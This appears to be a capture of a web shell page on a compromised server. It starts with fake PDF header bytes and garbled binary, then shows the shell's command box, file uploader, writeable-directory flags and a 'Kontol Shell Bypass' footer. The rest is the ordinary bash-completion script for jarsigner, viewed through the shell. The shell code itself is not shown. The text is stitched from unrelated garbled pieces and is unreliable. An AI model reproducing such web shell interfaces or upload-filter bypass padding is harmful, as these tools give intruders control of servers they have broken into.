%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /snap/core22/current/usr/share/bash-completion/completions/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //snap/core22/current/usr/share/bash-completion/completions/jarsigner
# jarsigner(1) completion                                  -*- shell-script -*-

_jarsigner()
{
    local cur prev words cword
    _init_completion || return

    case $prev in
        -keystore)
            COMPREPLY=($(compgen -W 'NONE' -- "$cur"))
            _filedir '@(jks|ks|p12|pfx)'
            return
            ;;
        -storepass | -keypass | -sigfile | -digestalg | -sigalg | -tsacert | -tsapolicyid | \
            -tsadigestalg | -altsigner | -altsignerpath | -providerName | -providerClass | \
            -providerArg)
            return
            ;;
        -certchain | -tsa)
            _filedir
            return
            ;;
        -storetype)
            COMPREPLY=($(compgen -W 'JKS PKCS11 PKCS12' -- "$cur"))
            return
            ;;
        -signedjar)
            _filedir '@(jar|apk)'
            return
            ;;
    esac

    # Check if a jar was already given.
    local i jar=false
    for ((i = 1; i < ${#words[@]} - 1; i++)); do
        if [[ ${words[i]} == *.@(jar|apk) && \
            ${words[i - 1]} != -signedjar ]]; then
            jar=true
            break
        fi
    done

    if ! $jar; then
        if [[ $cur == -* ]]; then
            # Documented as "should not be used": -internalsf, -sectionsonly
            COMPREPLY=($(compgen -W '-keystore -storepass -storetype
                -keypass -sigfile -signedjar -digestalg -sigalg -verify
                -verbose -certs -tsa -tsacert -altsigner -altsignerpath
                -protected -providerName -providerClass -providerArg' \
                -- "$cur"))
        fi
        _filedir '@(jar|apk)'
    fi
} &&
    complete -F _jarsigner jarsigner

# ex: filetype=sh

Kontol Shell Bypass